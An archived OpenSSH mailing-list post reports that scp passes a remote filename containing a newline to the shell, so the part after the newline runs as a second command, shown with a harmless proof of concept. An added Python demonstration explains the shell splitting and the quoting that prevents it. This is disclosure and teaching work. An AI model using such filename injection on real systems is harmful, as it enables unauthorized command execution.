scp, sftp, and special characters in filenames
David Newall
openssh at davidnewall.com
Mon Nov 4 11:43:27 AEDT 2019
On 4/11/19 3:29 am, Demi M. Obenour wrote:
> I have not been able to get scp(1) to download a file with a newline
> in its name. I know that scp(1) requires that remote filenames be
> escaped for the shell, but that leads to protocol errors.
I see something much worse:
$ sudo sh
# echo "#!/bin/sh
touch /tmp/b-ran" > /tmp/b
# chmod a+x /tmp/b
# exit
$ touch a 'a
b'
$ rm -f abc /tmp/b-ran
$ scp localhost:'a
b' abc
a 100% 0 0.0KB/s 00:00
$ ls /tmp/b-ran
/tmp/b-ran
Scp can be exploited to run commands, which I think is a problem.
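The parsing behind the transcript above, as an added example that is not part of the original post. It assumes the legacy scp protocol, where the client asks the server to run `scp -f <path>` and sshd passes that string to the account's shell with `-c`. A `printf` builtin stands in for the real remote scp (hypothetical stand-in, no network, nothing copied), and `shlex.quote` shows the name as a single shell word by contrast.

```python
import shlex
import subprocess

# Stand-in for the remote side (assumption: the server's shell receives
# "scp -f <path>" as one command string). printf is a shell builtin and
# prints every argument it receives in brackets.
STANDIN = "printf '[%s]' scp -f "


def remote_shell_sees(path, quote):
    """Return (exit_status, stdout) after /bin/sh parses 'scp -f <path>'."""
    arg = shlex.quote(path) if quote else path
    proc = subprocess.run(
        ["/bin/sh", "-c", STANDIN + arg],
        # Empty PATH: a stray word on its own line resolves to no program,
        # so the shell reports 127 (command not found) instead of running it.
        env={"PATH": "/nonexistent"},
        capture_output=True,
        text=True,
    )
    return proc.returncode, proc.stdout


def needs_quoting(path):
    """True when the shell would not read path as one literal word."""
    return shlex.quote(path) != path


if __name__ == "__main__":
    name = "a\nb"  # constructed sample: the filename used in the post
    print("needs quoting:", needs_quoting(name))
    # Unquoted: the newline ends the first command and "b" becomes a second one.
    print("unquoted:", remote_shell_sees(name, quote=False))
    # Quoted: the whole name, newline included, is one argument.
    print("quoted:  ", remote_shell_sees(name, quote=True))
```

Exit status 127 in the unquoted case is the shell failing to find a command named `b`; with a `b` reachable on the remote PATH that second line would execute instead.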